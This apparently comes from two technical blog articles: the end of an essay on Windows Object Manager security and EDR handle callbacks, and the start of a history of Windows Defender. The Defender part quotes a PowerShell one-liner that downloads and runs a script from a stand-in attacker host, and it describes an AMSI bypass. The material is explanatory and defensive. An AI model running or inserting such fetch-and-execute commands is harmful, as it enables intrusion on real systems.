A small enough TCB can be machine-verified. The seL4 microkernel is the canonical demonstration: roughly 9,000 lines of C verified end-to-end against a formal specification (~11 person-years for initial functional correctness per Klein et al. SOSP 2009, and approximately 25 person-years for the full suite of subsequent proofs including information-flow and binary verification) [@sel4-project]. The Object Manager subsystem, the Security Reference Monitor, and the parse procedures the Object Manager delegates to (file-system drivers via IopParseDevice; the registry via CmpParseKey; ALPC; the I/O manager itself) collectively comprise tens of thousands of lines of C, putting the TCB for "open a named object" at one to two orders of magnitude above the verification threshold any current proof system can handle. The Object Manager is not evaluable in the formal sense Anderson required.

8.4 Non-bypassable: the privilege short-circuit

A process holding SeDebugPrivilege (or any privilege that grants PROCESS_VM_* rights) can short-circuit per-directory ACLs. The privilege evaluation happens at SeAccessCheck time, after ObpLookupObjectName has resolved the name. The Object Manager will resolve any path the privileged caller asks for; the gate fires, but it lets the call through. The namespace cannot defend against the holder of SeDebugPrivilege. This is by design -- you want a debugger to be able to attach to anything -- but it is also the structural reason why "lock down the namespace" is not by itself a containment story.

8.5 What else the namespace cannot do

It cannot prevent in-process memory disclosure -- the Pass-the-Challenge limit covered in the Section 7 aside. It cannot defend against a malicious driver -- KMCS, HVCI, and WDAC gate driver load; the namespace itself trusts already-loaded drivers. It cannot eliminate time-of-check / time-of-use racing during a path walk; the walker walks components one at a time, and any reentrant call into the walker is a TOCTOU surface. The mitigation is per-call -- callers pass OBJ_DONT_REPARSE on object-attributes, FILE_FLAG_OPEN_REPARSE_POINT on file opens, or otherwise instruct the path-walker to refuse symbolic-link substitution -- not a structural property of the namespace.

8.6 The honest accounting

The Object Manager namespace is a coordination mechanism, not a containment mechanism. Containment is in the layers above: the session ID, the package SID, the integrity level, the silo ID, the VTL split. The namespace's job is to make those layers enforceable by partitioning the path space so the bad open cannot resolve to the privileged object's name. The layers above decide which partition the caller is in; the namespace's only job is "given a path and a caller, find the object." Anderson 1972 names the kernel mechanism (the reference-validation mechanism with NEAT properties); Saltzer-Schroeder 1975 names the design principles the mechanism must satisfy. The Object Manager is the Windows realisation; it inherits both the strengths and the limits.

The namespace is a coordination mechanism, not a containment mechanism. The containment is in the layers above.

Key idea: The Object Manager is the coordination layer; the containment is in the partition primitives stacked on top (session ID, package SID, integrity level, silo ID, VTL). The namespace's only job is "given a path and a caller, find the object." Every Windows security boundary is a parameter to that one job: a per-directory ACL, a token-keyed name rewrite, or a kernel callback registered against an OBJECT_TYPE.

The provable gaps are real. What is the active research direction in 2026 -- where do attackers and defenders actually meet inside the namespace today?

9. Open problems in 2026

Five open problems sit in active research as of 2026.

9.1 Hash-bucket collision pressure

The 37-bucket constant has not changed since 1993. On a 2026 Windows 11 25H2 machine with several hundred MSIX packages, each owning an \AppContainerNamedObjects\<package-sid>\ subtree, average chain lengths inside \Sessions\1\AppContainerNamedObjects exceed two and routinely run higher under load. The structural impact is small per-lookup (O(chain length) at each component), but it compounds across deep path walks and across the per-VM hot loops in ObpLookupObjectName. Microsoft has not committed to a larger table or a different structure; the constant remains.

9.2 Cross-AppContainer object-directory privacy

Per-AppContainer isolation is the AppContainer model's promise; residual cross-package reads erode it. Forshaw's Project Zero work between 2017 and 2020 documents specific classes; Windows 11 25H2 DACLs are tighter than Windows 10 RTM, but the impersonation-mediated cases survive. The HackSys / CVE-2023-35359 family covered in Section 4.5 is the current realisation of the cross-AppContainer-plus-impersonation surface, and the same broader resource-planting taxonomy Forshaw described in the 2017 Named Pipe Secure Prefixes post [@tiraniddo-named-pipe-secure-prefixes] is still rediscovered every year.

9.3 Silo-escape via routines that ignore silo attachment

Siloscape (June 7, 2021) showed that NtSetInformationSymbolicLink could retarget a silo-scoped symbolic link at a host-scoped path. Microsoft patched the specific function; the class -- kernel routines whose path resolution does not honour Process->Silo->RootDirectory -- remains open. Microsoft's long-standing position is that Server Silo is not a security boundary; Hyper-V Container is the security-boundary product. Container runtimes that depend on Server Silo for tenant isolation are knowingly running outside the supported boundary.

9.4 ObRegisterCallbacks erosion under HVCI

ObRegisterCallbacks requires a KMCS-signed driver, and on HVCI-enabled machines the binary must additionally be HVCI-compatible. Microsoft has progressively raised the compatibility bar -- preventing unsigned drivers, banning common runtime-patching idioms, and tightening the W^X policy. EDR vendors depend on the surface staying open; if HVCI's compatibility bar ever excludes the EDR kernel driver pattern, the in-kernel callback layer is at risk. The CrowdStrike Falcon Sensor outage of July 2024 made the brittleness of in-kernel EDR a public conversation. Microsoft's Defender for Endpoint and EDR-on-Linux eBPF projects point at alternative-mediation futures, but in-kernel ObRegisterCallbacks is still the primary credential-theft sensor.

Note: As attackers ship Hell's Gate / Halo's Gate / direct-syscall stubs to bypass userland EDR hooks, the kernel callback fires regardless. The arms race accordingly shifts to the access-mask-strip vs. impersonate-trusted-parent-PID layer inside the kernel callback itself, with both sides racing to define the right pre-operation policy for lsass.exe handle opens. Watch the Microsoft Security Response Center advisories and the EDR-vendor incident postmortems for the bleeding edge.

9.5 Public benchmark vacuum

No peer-reviewed benchmark compares per-call namespace-lookup cost across the Windows Object Manager, Linux namespaces, and Mach ports. Choice of namespace design at the OS level is a multi-decade commitment; the absence of an empirical comparison forces architecture decisions on theoretical-only grounds. The Linux Kernel Test Robot, the Phoronix Test Suite, and various academic systems-conference benchmarks measure adjacent properties (filesystem-call latency, system-call vector cost), but none publishes head-to-head numbers on the named-object-lookup hot path. This is an open invitation to systems researchers.

Five open problems is a research agenda, not a how-to. How do you actually look at this thing on your own machine?

10. Reading the namespace from a live system

Three tools cover the operational practice: Sysinternals WinObj, Forshaw's NtObjectManager PowerShell module, and WinDbg in kernel mode.

10.1 WinObj on a live system

Download winobj.exe from Sysinternals [@ms-winobj] and run it as administrator. The left pane is the directory tree; the right pane shows the children of the selected directory with their object types. Navigate to \Sessions\1\BaseNamedObjects and read off the named events and mutants every Win32 app in your interactive session has created. Navigate to \Sessions\1\AppContainerNamedObjects and pick an S-1-15-2-... directory; right-click, choose Properties, and read the security descriptor. You will see a single allow-ACE granting full access only to the package SID itself. That ACE is the entire AppContainer sandbox at the namespace layer.

Note: WinObj cannot traverse \ObjectTypes, \Security, or \Sessions\0\ without administrator rights. Without traversal, the enumerate fails silently and the tree looks empty. Always run elevated, and accept that the tool will show the kernel view, not a per-process view.

10.2 NtObjectManager PowerShell

NtObjectManager is Forshaw's PowerShell module that exposes the Object Manager namespace through cmdlets (PowerShell Gallery [@powershellgallery-ntobjectmanager]; GitHub [@p0-sandbox-attacksurface-analysis-tools]). Install with Install-Module NtObjectManager. Useful commands: Get-ChildItem NtObject:\ walks the root; Get-NtType lists the registered OBJECT_TYPE singletons; Get-NtObject \BaseNamedObjects enumerates the global BNO; Get-NtAlpcPort '\RPC Control' lists every LRPC endpoint on the machine. The module wraps the same NTDLL syscalls WinObj uses, but in a scripting surface that composes into automation.

10.3 WinDbg kernel session

In a kernel-mode WinDbg session attached to a target machine (or to a live local kernel via Microsoft's local-kernel debug mode), !object \ dumps the root directory and its children. dt nt!_OBJECT_HEADER <addr>-30 reads the header preceding any object's body (the offset 0x30 is the size of OBJECT_HEADER on x64; subtract that from the body pointer to land on the header -- the field layout is documented in Windows Internals 7th Edition* Chapter 8, Microsoft Press Store [@microsoftpressstore-wininternals7-part1]). `dx -r1 ((nt!_OBJECT_TYPE)nt!PsProcessType[0]).TypeInfo` walks the Process type's method table and lists all eight procedure pointers and the WaitObjectFlagOffset, including the parse procedure.

10.4 The EDR primitive: an ObRegisterCallbacks driver template

The minimal sketch of an in-kernel EDR sensor is four steps. Register an OB_CALLBACK_REGISTRATION for PsProcessType with OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE [@ms-obregistercallbacks]. In the pre-operation callback, examine OperationInformation->Object, derive the target process's PID, and compare it against lsass.exe. If it matches, strip credential-relevant access bits from OperationInformation->Parameters->CreateHandleInformation.DesiredAccess (or duplicate-handle equivalent). The kernel grants the handle with the reduced rights, the attacker's PROCESS_VM_READ is gone before the call returns, and the post-operation callback logs the attempt. The parallel API PsSetCreateProcessNotifyRoutineEx [@ms-pssetcreateprocessnotifyroutineex] covers process creation, which is the other half of the EDR sensor surface.

sequenceDiagram participant A as Attacker process participant NT as nt!NtOpenProcess participant OM as Object Manager participant EDR as EDR Pre-Op Callback participant LSASS as lsass.exe (target) A->>NT: NtOpenProcess(lsass PID, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) NT->>OM: lookup PsProcessType, target by PID OM->>EDR: fire pre-op callback (handle create) EDR->>EDR: target == lsass.exe? EDR->>EDR: strip PROCESS_VM_READ from DesiredAccess EDR-->>OM: granted = PROCESS_QUERY_LIMITED_INFORMATION OM-->>NT: HANDLE with reduced access NT-->>A: open succeeded (but useless rights)

{` const PROCESS_VM_READ = 0x0010; const PROCESS_VM_WRITE = 0x0020; const PROCESS_VM_OPERATION = 0x0008; const PROCESS_QUERY_INFORMATION = 0x0400; const PROCESS_QUERY_LIMITED_INFORMATION = 0x1000; const PROCESS_CREATE_THREAD = 0x0002; const PROCESS_DUP_HANDLE = 0x0040;

function stripForLsass(desired) { const STRIPPED = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION; return desired & ~STRIPPED; }

const desired = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE; console.log('attacker asked for:', '0x' + desired.toString(16)); const granted = stripForLsass(desired) | PROCESS_QUERY_LIMITED_INFORMATION; console.log('EDR pre-op granted:', '0x' + granted.toString(16)); `}

```c OB_OPERATION_REGISTRATION op = { .ObjectType = PsProcessType, .Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE, .PreOperation = MyPreOp, .PostOperation = MyPostOp, }; OB_CALLBACK_REGISTRATION reg = { .Version = OB_FLT_REGISTRATION_VERSION, .OperationRegistrationCount = 1, .Altitude = RTL_CONSTANT_STRING(L"123456"), .OperationRegistration = &op, }; ObRegisterCallbacks(®, &g_handle); ``` The driver must be KMCS-signed (`IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY`) per the wdm.h documentation; an unsigned image returns `STATUS_ACCESS_DENIED` from `ObRegisterCallbacks`. Two drivers cannot pick the same Altitude; collisions return `STATUS_FLT_INSTANCE_ALTITUDE_COLLISION`.

You can now read the namespace, register an EDR-style callback, and dump the type registry. What are the questions readers ask after they finish reading?

11. Frequently asked questions

No. The registry is a separate Windows Executive subsystem implemented in `nt!Cm*`, with its own hive on-disk format and its own in-memory hive structures. It hooks into the Object Manager namespace through one and only one mechanism: the `Key` `OBJECT_TYPE` registers a `ParseProcedure` (`CmpParseKey`) that takes over path walking when the namespace walker reaches `\REGISTRY`. The registry is therefore a *consumer* of the Object Manager, but not part of the Object Manager. Because `\BaseNamedObjects` is the *global* / `Global\`-prefixed-only view, distinct from the per-session BNO at `\Sessions\\BaseNamedObjects`. The Win32 `Local\` prefix routes through `kernel32!BaseGetNamedObjectDirectory` into the per-session BNO; `Global\` routes into the global one [@ms-termserv-kernel-object-namespaces]. Cross-session named-object coordination still needs the global view; per-session isolation lives in the per-session subtree. Because the lowbox token attached to the UWP app's process tells `ObpLookupObjectName` to rewrite the path to `\Sessions\\AppContainerNamedObjects\\Global\Foo` before path walking. Two different UWP apps have two different package SIDs and therefore land on two different directories. The Win32 names look the same; the kernel resolves them to different objects. `\??\C:` is the per-session DosDevices alias; if `C:` is not defined in the current session's `\??`, the walker falls through to `\GLOBAL??\C:`. `\GLOBAL??\C:` is the machine-wide DosDevices symbolic link to `\Device\HarddiskVolume*` -- the real on-disk volume object. The split matters because the per-session `\??` is where per-session drive-letter remappings (`net use X: \\server\share`, `subst Z: C:\foo`, `DefineDosDevice`) live, and the activation-context resolver class covered in Section 4.5 is the exploit family that lives at this boundary. Several top-level directories have `Directory`-`TRAVERSE` ACLs that restrict to SYSTEM and the local Administrators group. Without traversal, the directory enumeration silently fails. `\ObjectTypes`, `\Security`, and `\Sessions\0\` are the directories users most often notice as "missing" when running unelevated. By DACL plus loader-side validation. The directory grants `Directory`-`READ` to everyone but `Directory`-`WRITE` only to SYSTEM and TrustedInstaller. The `Section` objects inside are Authenticode-signed by Microsoft and validated at boot by `smss.exe`. The historical `DefineDosDevice` + `\??` symlink-plant bypass class survived until Windows 10 21H2 build 19044.1826 (July 2022), when an NTDLL patch closed it [@itm4n-the-end-of-ppldump]. `ObRegisterCallbacks` [@ms-obregistercallbacks] and `PsSetCreateProcessNotifyRoutineEx` [@ms-pssetcreateprocessnotifyroutineex] are both fully documented. The HVCI compatibility requirements, the KMCS attestation flow, and the exact policy interactions with Defender for Endpoint's tamper-protection layer are partly implementation-defined; EDR vendor engineering teams maintain private regression suites against successive Windows feature updates. When two or more processes that don't share a session or package must coordinate over a securable directory keyed by a SID-list they agree on at design time. The boundary descriptor is the *agreement primitive*: the kernel requires every SID in the boundary to be in the caller's token. The namespace's `OBJECT_DIRECTORY` lives in `\BNOLINKS`, keyed by the alias-prefix string plus a hash of the boundary descriptor's SID-list (CreatePrivateNamespaceW [@ms-createprivatenamespacew]; Object Namespaces overview [@ms-object-namespaces]; native NtCreatePrivateNamespace [@ntdoc-ntcreateprivatenamespace] and OBJECT_BOUNDARY_DESCRIPTOR [@ntdoc-object-boundary-descriptor] signatures). From inside an AppContainer process the lookup is rewritten into the per-package subtree, so private namespaces are not a substitute for the `windows.applicationModel.*` brokered APIs when cross-package coordination is the goal. A user-mode structure produced by `CreateBoundaryDescriptor` and populated with `AddSIDToBoundaryDescriptor` (plus the optional `CREATE_BOUNDARY_DESCRIPTOR_ADD_APPCONTAINER_SID` flag). Conceptually the descriptor is a SID-list that the caller and every other participant must share via their tokens. Kernel-side the structure is `OBJECT_BOUNDARY_DESCRIPTOR` (Version, Items, TotalSize, Flags). `NtCreatePrivateNamespace` materialises a directory in `\BNOLINKS` keyed by the `lpAliasPrefix` plus a hash of the boundary descriptor's SIDs.

12. Coming back to the WinObj screen

Open WinObj one more time. Navigate back to \Sessions\1\AppContainerNamedObjects and pick the Edge renderer's S-1-15-2-... directory. You can now name everything you are looking at. The directory is an _OBJECT_DIRECTORY instance with 37 hash buckets. You reach it through a token-keyed rewrite that the kernel applies inside ObpLookupObjectName before path walking begins. Its security descriptor grants GenericAll only to the package SID. Every EDR loaded on this machine has registered an ObRegisterCallbacks filter on PsProcessType, watching for handle creations against lsass.exe. If you are running on a Server SKU with Windows Server Containers, the directory might also be silo-scoped, with Process->Silo->RootDirectory indirecting your view of the rest of \.

The four pieces of the 1993 Cutler design have shipped without architectural change for thirty-three years. The six generations of partition primitives stacked on top are all simultaneously load-bearing on Windows 11 25H2. The namespace itself is a coordination mechanism, in Anderson 1972's sense of the reference-validation mechanism, with Saltzer-Schroeder 1975's complete-mediation principle as the design constraint it must satisfy. Containment lives in the partition layers above it: the session, the package, the integrity level, the silo, and the VTL split. Every other article in this corpus -- the Credential Guard piece, the AppContainer piece, the VBS Trustlets piece, the Hyper-V piece, the App Identity piece, the TPM piece -- quietly assumes this tree underneath them.

Key idea: Every Windows security boundary is a path rewrite, a per-directory ACL, a token-keyed name substitution, or a kernel callback against an OBJECT_TYPE. The Object Manager is the data structure underneath them all.

**Key terms.** Object Manager (`Ob`), `OBJECT_HEADER`, `OBJECT_TYPE`, `ParseProcedure`, `OBJECT_DIRECTORY`, Lowbox token, AppContainer, Server Silo, Trustlet / IUM, Boundary descriptor, Session 0 isolation, Mandatory Integrity Control, `ObRegisterCallbacks`, KMCS, HVCI, `\BaseNamedObjects`, `\Sessions\\AppContainerNamedObjects`, `\RPC Control`, `\KnownDlls`, `\BNOLINKS`, `\GLOBAL??`, `\??`.

Review questions.

Why does AppContainer isolation work even when the calling UWP app explicitly asks for Global\X?
What is the relationship between IopParseDevice, \Device\HarddiskVolume1, and IRP_MJ_CREATE?
Which of Anderson 1972's four NEAT properties does the Object Manager achieve cleanly, and which does it provably fail?
Why is ObRegisterCallbacks an enforcement gate only against handle creation and duplication, not against handle use?
Why does the canonical MS15-090 OM-symlink CVE point at CVE-2015-2428 [@nvd-cve-2015-2428] rather than CVE-2015-2528 or CVE-2015-1463?
What is the structural difference between \??\C: and \GLOBAL??\C:, and which one does the HackSys / CVE-2023-35359 worked example abuse?

Recommended reading. Russinovich, Ionescu, and Solomon, Windows Internals, Part 1 (7th edition, Microsoft Press, 2017), Chapter 8 [@microsoftpressstore-wininternals7-part1]. James Forshaw, Windows Security Internals (No Starch Press, 2024), Chapter 8 [@nostarch-windows-security-internals]. Alex Ionescu, Battle of SKM and IUM, Black Hat USA 2015 [@ionescu-bh2015-pdf]. The Google Project Zero blog's symlink mitigations [@p0-symlink-mitigations], arbitrary directory creation [@p0-issue1550], and who contains the containers [@p0-who-contains-containers] posts. James P. Anderson, Computer Security Technology Planning Study [@csrc-nist-ande72].

The Defender's Dilemma: How Microsoft Won the Antivirus War It Can Never Finish

noreply@paragmali.com (Parag Mali) — Wed, 29 Apr 2026 00:00:00 GMT

**Windows Defender went from scoring 0.5/6 in AV-TEST protection testing (2012) to top-tier MITRE ATT&CK Enterprise results with zero false positives (2024).** The transformation happened through four generational leaps: cloud-delivered ML protection, AMSI for fileless malware visibility, EDR for post-breach detection, and unified XDR across endpoints, email, identity, and cloud. Despite this, Fred Cohen's 1986 dissertation establishes that perfect malware detection is mathematically impossible -- every endpoint protection system, including Defender, operates within this theoretical ceiling.

From Zero to Hero

In October 2012, AV-TEST -- the world's most respected independent antivirus testing lab -- published results that should have embarrassed Microsoft into silence. Windows Defender, the antivirus built into Windows 8, scored 0.5 out of 6.0 for malware protection [@av-test]. Dead last among 25 products tested. Worse than free tools from startups nobody had heard of.

Twelve years later, the lineage that began with Windows Defender sat inside Microsoft Defender XDR, a cross-domain security suite that achieved top-tier 2024 MITRE ATT&CK Enterprise results with zero false positives [@mitre-2024]. For the sixth consecutive year, Gartner named Microsoft a Leader in Endpoint Protection Platforms [@gartner-epp-2025].

This is the story of how that happened -- and why, despite the transformation, the war can never be won.

Key idea: A product that scored dead last in independent testing in 2012 became an industry leader by 2024. The reversal was not incremental improvement -- it was a complete architectural revolution spanning cloud ML, behavioral analysis, and cross-domain correlation.

To understand how Defender reached this point, we need to go back to the moment when Microsoft was forced to care about security -- not because they wanted to, but because worms were literally attacking their own update servers.

Historical Origins: The Trustworthy Computing Pivot

On August 11, 2003, the Blaster worm infected hundreds of thousands of Windows PCs [@ms03-026]. It carried a message embedded in its code: "billy gates why do you make this possible ? Stop making money and fix your software!!"The Blaster worm's embedded taunt -- "billy gates why do you make this possible ? Stop making money and fix your software!!" -- became one of the most quoted lines in malware history. It captured the frustration millions of users felt with Windows security in the early 2000s.

The answer had actually begun 18 months earlier. On January 15, 2002, Bill Gates sent an internal memo to every Microsoft employee that would reshape the company's entire engineering culture.

Trustworthy Computing is the highest priority for all the work we are doing. -- Bill Gates, January 15, 2002 [@gates-memo]

Gates' memo came in response to a cascade of security catastrophes. In July 2001, the Code Red worm tore through hundreds of thousands of IIS web servers, defacing websites and launching DDoS attacks against whitehouse.gov [@cert-code-red]. Weeks later, the Nimda worm used five distinct propagation methods -- email, network shares, web servers, browser exploits, and back doors left by Code Red II -- causing massive infrastructure disruption [@cert-nimda]. Coming days after September 11, Nimda heightened the sense of digital infrastructure vulnerability across the United States.

Microsoft's company-wide security pivot initiated by Bill Gates' January 2002 memo. It paused Windows development for security audits, created the Security Development Lifecycle (SDL), and led to the creation of the Security Technology Unit that would eventually build Windows Defender.

Then came Blaster (2003), which exploited a known RPC buffer overflow to crash millions of Windows systems and attempted a DDoS attack against windowsupdate.com -- Microsoft's own patching infrastructure [@ms03-026]. Sasser followed in April 2004, a self-propagating worm written by an 18-year-old German student that required no user interaction and took down hospitals, airlines, and banks worldwide [@ms04-011].

The first tangible fruit of Gates' memo was Windows XP Service Pack 2 (August 2004), which enabled Windows Firewall by default, introduced the Security Center, and added Data Execution Prevention [@wp-xp-sp2]. But the worms were only half the problem. By 2004, studies estimated 67% of home PCs were infected with spyware -- browser hijackers, bundled toolbars, and adware installed without informed consent.

Microsoft needed an antispyware tool, and they needed it fast. In December 2004, they acquired GIANT Company Software and its GIANT AntiSpyware product [@giant-acquisition]. Within a month, Microsoft released it as Microsoft AntiSpyware Beta [@wp-defender]. By 2006, it was rebranded as Windows Defender; it shipped with Vista in January 2007 [@wp-defender].

Microsoft now had an antispyware tool -- but spyware was only half the problem. Viruses, trojans, and worms were still devastating Windows systems, and Defender 1.0 couldn't detect any of them.

Early Approaches: Signatures and Their Limits

Windows Defender 1.0 shipped with Vista in January 2007, and it could scan your PC for spyware. Just spyware. Not viruses. Not trojans. Not ransomware. It was like selling a house with a lock on the front door and no walls.

A malware identification technique that compares files against a database of known malware "signatures" -- cryptographic hashes and byte-pattern rules. Fast and precise for known threats, but fundamentally reactive: a new malware sample must be captured, analyzed, and signed before protection applies.

The detection engine worked through simple pattern matching. On access or during scheduled scans, files were hashed and compared against a curated signature database delivered through Windows Update. Hash-based lookups ran in $O(n)$ time (where $n$ = files scanned), while pattern-matching rules against the full signature database ran in $O(n \times m)$ (where $m$ = pattern count). Space was proportional to the database -- tens of megabytes.

The approach had a fatal structural weakness: it was purely reactive. A new spyware sample had to be captured, analyzed, signed, and distributed before any endpoint received protection. Average time-to-signature was hours to days. And polymorphic malware -- code that changes its binary representation on every infection -- rendered signatures nearly useless.Windows Live OneCare (2006--2009) was Microsoft's first attempt at a paid consumer security suite [@wp-defender]. It bundled antivirus, firewall, backup, and PC tune-up into a subscription product. It flopped: poor detection rates, low market share against Norton and McAfee, and Microsoft's eventual realization that free, universal security was the only path forward. OneCare was discontinued June 30, 2009.

A polymorphic variant of the Vundo trojan (2007--2008) illustrated the problem perfectly [@wp-defender]. Vundo repacked itself on every infection, generating a unique binary hash each time. Defender's signature database couldn't keep pace with the variant generation rate. Users were infected despite having "protection" enabled.

Microsoft knew signatures alone were a losing game. In September 2009, they released Microsoft Security Essentials (MSE) -- a free standalone antivirus for Windows XP, Vista, and 7 that added virus detection alongside the spyware scanning [@wp-defender]. MSE replaced the failed OneCare product and proved Microsoft could build a competent, if basic, AV engine.

Then came the merger that seemed like a triumph. Windows 8 (October 2012) absorbed MSE's antivirus capabilities directly into Defender, creating the first Windows version with built-in, always-on antivirus protection. Every Windows PC would finally have real antivirus from the moment of installation.

Problem solved? Not even close. The independent labs were about to deliver a devastating verdict.

The Humiliation: Worst-in-Class Scores

When Windows 8 shipped in October 2012 with Defender built in, it seemed like a structural win -- every Windows PC would finally have antivirus protection by default. Then the test results came in.

AV-TEST's October 2012 evaluation scored Windows Defender 0.5 out of 6.0 for the aggregate Protection category -- the worst score among all 25 products tested [@av-test]. In that testing period, it missed a significant proportion of real-world malware samples that competitors caught routinely. Across 2012--2014, Defender protection scores hovered between 0.5 and 2.0 out of 6.0 -- near the bottom of every independent test.

gantt title Defender AV-TEST Protection Score Progression dateFormat YYYY axisFormat %Y section Protection Score 0.5-2.0/6 (Worst tier) :crit, 2012, 2015 3.0-4.5/6 (Improving) :active, 2015, 2017 5.0-5.5/6 (Competitive) :active, 2017, 2019 6.0/6 (Top tier, consistent) :done, 2019, 2026

The industry's verdict was damning. Security analysts described Defender as "baseline protection" -- polite language for "better than nothing, barely." CryptoLocker ransomware arrived in September 2013, encrypting users' files and demanding ransom payment [@wp-cryptolocker]. Signature-based Defender couldn't detect it until days after initial distribution, by which time hundreds of thousands of PCs were already compromised.CrowdStrike, founded in 2011 by George Kurtz, Dmitri Alperovitch, and Gregg Marston [@wp-crowdstrike], was building a fundamentally different approach during this period -- a cloud-native, agent-based EDR platform that would become Defender's most formidable competitor.

Meanwhile, the competitive field was shifting. Norton, McAfee, and Kaspersky still dominated the traditional AV market. But new cloud-native challengers were emerging. CrowdStrike launched its Falcon platform commercially around 2013--2014, betting on cloud-delivered threat intelligence and behavioral detection [@wp-crowdstrike]. SentinelOne, also founded in 2013 [@wp-sentinelone], wagered on autonomous on-device AI.

But here's the structural insight that Microsoft's leadership grasped: integration was right. Universal-default protection was right. The detection engine was wrong. The question became whether Microsoft could revolutionize the detection engine without undoing the universal-default advantage.

The answer would come from the cloud.

The Breakthrough: Cloud, AMSI, and Machine Learning

Between 2015 and 2018, Microsoft executed the fastest architectural transformation in antivirus history. In four years, Defender went from a signature-based scanner to a cloud-powered, ML-driven, behavior-aware platform. The key insight: stop scanning files. Start understanding behavior.

Cloud-Delivered Protection and Block at First Sight

A detection architecture where unknown files on an endpoint are analyzed in real-time by cloud-based machine learning models. The endpoint sends file metadata and samples to the cloud, which returns a verdict (malicious, clean, or unknown) typically within milliseconds.

Windows 10 (July 2015) connected Defender to Microsoft's Azure cloud for real-time verdicts [@cloud-protection]. When an endpoint encounters an unknown file, Defender sends its metadata to the cloud service. Cloud ML models -- including gradient-boosted tree ensembles and deep neural networks -- analyze the sample and return a classification [@ml-pipeline].

A Defender feature that holds unknown files from execution until the cloud returns a verdict. If the cloud classifies the file as malicious, it is blocked and quarantined before the user is ever exposed. This reduces zero-day exposure from hours (waiting for signature updates) to milliseconds.

The real breakthrough came with Block at First Sight (BAFS), introduced with the Windows 10 Anniversary Update in 2016 and expanded through later cloud-protection improvements [@wp-defender, @bafs-blog]. When Defender encounters a file it has never seen before, BAFS holds it -- preventing execution -- while the cloud runs its ML pipeline. The verdict comes back in milliseconds to seconds. If malicious, the file is quarantined. If clean, execution proceeds. The user never notices the delay.

Approximately 96% of all malware files detected and blocked by Windows Defender Antivirus (Windows Defender AV) are observed only once on a single computer. -- Microsoft Security Blog, 2017 [@bafs-blog]

That statistic -- 96% of malware is unique to a single endpoint -- explains why signatures were doomed. You can't write a signature for something you've never seen. But you can train a model on billions of samples and classify new variants in real time.

sequenceDiagram participant User as User participant Endpoint as Defender Endpoint participant Cloud as Microsoft Cloud participant ML as ML Models User->>Endpoint: Opens unknown file Endpoint->>Endpoint: Local signature check (miss) Endpoint->>Endpoint: On-device ML (uncertain) Endpoint->>Cloud: Send file metadata + sample Note over Endpoint: File held from execution Cloud->>ML: Gradient-boosted trees + DNN ML->>Cloud: Verdict: MALICIOUS Cloud->>Endpoint: Block verdict Endpoint->>User: File quarantined Note over Cloud: Verdict shared to all endpoints

The feedback loop was the key multiplier. With over a billion Windows endpoints feeding telemetry into the cloud, every new threat detected on one machine instantly protected every other machine in the network. The entire Windows install base became a collective immune system.

AMSI: Seeing Through Obfuscation

A Windows API introduced in Windows 10 (2015) that allows script engines -- PowerShell, VBA, JavaScript, VBScript -- to submit content to the registered antimalware provider for scanning after deobfuscation but before execution. AMSI closes the fileless malware blind spot by inspecting code at the semantic layer rather than the file layer.

Cloud-delivered protection solved the "never-before-seen file" problem. But what about attacks that don't use files at all?

By 2015, attackers had discovered that PowerShell could execute entire attack frameworks entirely in memory. The PowerShell Empire framework, widely adopted from 2015 onward, could download and execute a malicious payload with a single command -- IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1') -- without ever writing a file to disk. Defender's file-scanning engine never had an opportunity to inspect the payload.

AMSI addressed this by creating an interface at the script execution layer [@amsi-docs]:

A script engine (PowerShell 5.0+, VBA, JavaScript) processes a script block
Before execution, the engine calls AmsiScanBuffer(), passing the deobfuscated content to AMSI
AMSI routes the content to the registered antimalware provider (Defender)
Defender scans the content against signatures, heuristics, and ML models
If malicious, execution is blocked and an event is logged

sequenceDiagram participant Script as PowerShell Script participant Engine as PowerShell Engine participant AMSI as AMSI Interface participant Defender as Windows Defender Script->>Engine: Encoded/obfuscated payload Engine->>Engine: Deobfuscate script block Engine->>AMSI: AmsiScanBuffer(deobfuscated content) AMSI->>Defender: Route to registered provider Defender->>Defender: Signature + ML scan alt Malicious Defender->>AMSI: AMSI_RESULT_DETECTED AMSI->>Engine: Block execution Engine->>Script: Execution prevented else Clean Defender->>AMSI: AMSI_RESULT_CLEAN AMSI->>Engine: Allow execution Engine->>Script: Script executes end

The word "deobfuscated" is the key. Attackers routinely obfuscated their PowerShell scripts with multiple layers of encoding -- Base64, XOR, string concatenation, variable substitution. By the time AMSI sees the content, the script engine has already resolved all that obfuscation down to the actual commands. AMSI scans what the code does, not what it looks like [@powershell-blue-team].

AMSI had a fundamental architectural vulnerability: it runs in user-mode, inside the process it's monitoring. That means user-mode code can tamper with AMSI's in-process state. By 2016, a widely cited PowerShell reflection technique could set `amsiInitFailed` to `true`, causing all subsequent AMSI scans to return "not detected" [@graeber-amsi-bypass]. While Microsoft signatured this specific bypass, the underlying issue -- that AMSI is accessible to the code it inspects -- has spawned an ongoing arms race of bypass variants and countermeasures. A widely cited AMSI bypass technique was elegant in its simplicity: one line of PowerShell reflection that flipped an internal flag. It demonstrated a deeper truth about user-mode security boundaries -- they are speed bumps, not walls.

The ML Pipeline

Behind both cloud protection and AMSI sits a multi-layered machine learning pipeline [@ml-pipeline]:

On-device gradient-boosted trees (GBT): Lightweight models that classify files based on static features -- PE header metadata, import tables, entropy scores. These run in milliseconds and handle the easy cases.
Cloud deep neural networks (DNN): For files the on-device model flags as uncertain, cloud-side DNNs perform deeper analysis on a richer feature set.
Cloud sandboxes: When ML models can't reach a confident verdict, the file is detonated in a behavioral sandbox. The sandbox observes what the file actually does -- network connections, registry modifications, process spawning -- and classifies based on behavior rather than static features.

Key idea: The shift from file scanning to behavior understanding was the conceptual revolution. Signatures asked "is this file known-bad?" Cloud ML asked "does this file look bad?" AMSI asked "is this behavior suspicious?" Each layer addressed a different class of threat, and together they covered ground that no single approach could reach alone.

